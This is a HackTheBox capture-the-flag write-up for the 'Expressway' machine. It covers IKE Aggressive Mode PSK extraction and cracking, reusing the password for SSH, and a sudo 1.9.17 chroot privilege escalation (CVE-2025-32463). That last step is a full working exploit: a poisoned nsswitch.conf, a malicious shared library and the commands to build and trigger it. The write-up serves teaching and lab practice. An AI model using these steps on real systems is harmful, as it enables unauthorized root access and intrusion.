$ cat writeup.md…

Expressway | CTF Base

infrafreemedium

Expressway

hackthebox

Task: HackTheBox medium machine with IPsec VPN (strongSwan) on UDP/500 and SSH. Solution: Extract PSK hash via IKE Aggressive Mode, crack it, reuse password for SSH access, then exploit CVE-2025-32463 (sudo 1.9.17 chroot LPE via nsswitch.conf poisoning) for root.

linux suid debian sudo hackthebox full_pwn ipsec ike vpn psk aggressive_mode credential_reuse nsswitch cve-2025-32463 strongswan

ike_aggressive_mode_psk_extractionpsk_dictionary_crackingcredential_reuse_vpn_to_sshsudo_chroot_lpe_nsswitch_poisoning

$ ls tags/ techniques/

linux suid debian sudo hackthebox full_pwn ipsec ike vpn psk aggressive_mode credential_reuse nsswitch cve-2025-32463 strongswan

ike_aggressive_mode_psk_extractionpsk_dictionary_crackingcredential_reuse_vpn_to_sshsudo_chroot_lpe_nsswitch_poisoning

Expressway — HackTheBox

Description

HackTheBox medium difficulty machine. Debian server with IPsec VPN (strongSwan) on UDP/500 and SSH on TCP/22. Initial access via PSK hash extraction from IKE Aggressive Mode and dictionary cracking, then password reuse for SSH. Privilege escalation through CVE-2025-32463 — a vulnerability in sudo 1.9.17 that allows loading an arbitrary shared library as root via nsswitch.conf substitution in a user-controlled chroot.

Reconnaissance

Port Scanning

Nmap discovered only 2 TCP ports:

22/tcp — SSH (OpenSSH 10.0p2 Debian)
53/tcp — unknown service (rabbit hole: connection establishes but any data causes "Network is down")

Key finding — UDP port 500 (IKE/ISAKMP):

nmap -sU -p 500 10.129.4.240
# 500/udp open isakmp

Analysis

IKE Enumeration

Probing the VPN service with ike-scan:

ike-scan 10.129.4.240

Result — IKEv1 Main Mode handshake with parameters:

Encryption: 3DES
Hash: SHA1
DH Group: 2 (modp1024)
Auth: PSK (Pre-Shared Key)
XAUTH support
Dead Peer Detection v1.0

Weak parameters (3DES + SHA1 + DH Group 2) and PSK authentication — classic vector for Aggressive Mode attack.

IKE Aggressive Mode — PSK Hash Extraction

IKEv1 Aggressive Mode transmits the PSK hash in cleartext (unlike Main Mode where identity is protected):

ike-scan --aggressive --id=vpn --pskcrack=ike_hash.txt 10.129.4.240

Server responded with Aggressive Mode handshake and revealed its identity:

Server ID: [email protected] (ID_USER_FQDN)
PSK hash saved to ike_hash.txt

PSK Cracking

psk-crack -d rockyou.txt ike_hash.txt

PSK: freakingrockstarontheroad

Solution

Step 1: User Access — SSH via Password Reuse

From IKE identity [email protected] extracted username ike. VPN PSK reused as SSH password:

sshpass -p 'freakingrockstarontheroad' ssh [email protected]

Successful login as ike (uid=1001, groups: ike, proxy).

cat /home/ike/user.txt
# d92ebe2ef753a2414aff0ba42be769c6

Step 2: Enumeration for Privilege Escalation

Key findings on the server:

Finding	Details	Result
`/usr/local/bin/sudo`	SUID, Sudo 1.9.17	VULNERABLE — CVE-2025-32463
`/usr/sbin/exim4`	SUID, Exim 4.98.2	Rabbit hole — drops privileges to Debian-exim
`/usr/sbin/in.tftpd`	TFTP → `/srv/tftp/ciscortr.cfg`	Informational — Cisco VPN config with PSK
strongSwan/charon	Running as root	VPN service, config in `/etc/ipsec.conf`
sudo privileges	`may not run sudo on expressway`	No sudo rules for ike

Step 3: CVE-2025-32463 — Sudo 1.9.17 Chroot LPE

Vulnerability: Sudo 1.9.17 allows an unprivileged user to use the -R flag (chroot) to specify an arbitrary root directory. When resolving paths, sudo performs chroot() to the specified directory and loads /etc/nsswitch.conf from there. If nsswitch.conf points to a malicious NSS library — it gets loaded as root.

CVSS: 9.3
Fixed in: sudo 1.9.17p1
CISA KEV: yes (actively exploited)

Vulnerability check:

/usr/local/bin/sudo -R woot woot
# Vulnerable version: "sudo: woot: No such file or directory"
# Fixed version: "you are not permitted to use the -R option"

Exploitation:

# Create working directory
cd $(mktemp -d)

# Create fake chroot structure
mkdir -p woot/etc libnss_

# Create poisoned nsswitch.conf — points to our NSS library
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc

# Write malicious shared library
cat > w.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void w(void){
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id; cat /root/root.txt");
}
EOF

# Compile as shared library
gcc -shared -fPIC -Wl,-init,w -o libnss_/woot1337.so.2 w.c

# Run sudo with our chroot — library gets loaded as root
/usr/local/bin/sudo -R woot woot

Result:

uid=0(root) gid=0(root) groups=0(root)
40efbdd162e3511d06a2dea9ee002ea0

Flags

User: d92ebe2ef753a2414aff0ba42be769c6
Root: 40efbdd162e3511d06a2dea9ee002ea0

Rabbit Holes

Port 53/tcp — looked like a DNS service in nmap, but connections established without data transfer ("Network is down"). Not a real DNS.
Exim 4.98.2 SUID (/usr/sbin/exim4) — SUID binary, but Exim immediately drops privileges to Debian-exim. The -be mode (expansion) runs as the calling user (euid=1001). CVE-2025-30232 (-dp UAF) didn't work — the -dp flag is not recognized in this build.
TFTP Cisco config (ciscortr.cfg) — contained VPN configuration and passwords (secret-password), but the information is not applicable for privilege escalation.

Key Indicators

Use this technique when:

UDP/500 open — IKE/ISAKMP service, check Aggressive Mode for PSK extraction
IKEv1 + PSK + Aggressive Mode — PSK hash transmitted in cleartext, can be cracked
ID_USER_FQDN in IKE — format user@domain may reveal usernames for SSH
Non-standard sudo (/usr/local/bin/sudo) — custom installation, check version
Sudo 1.9.17 — vulnerable to CVE-2025-32463 (chroot LPE via nsswitch poisoning)
sudo -R accepted without "not permitted" error — confirms vulnerability
strongSwan/charon on server — VPN infrastructure, passwords may be reused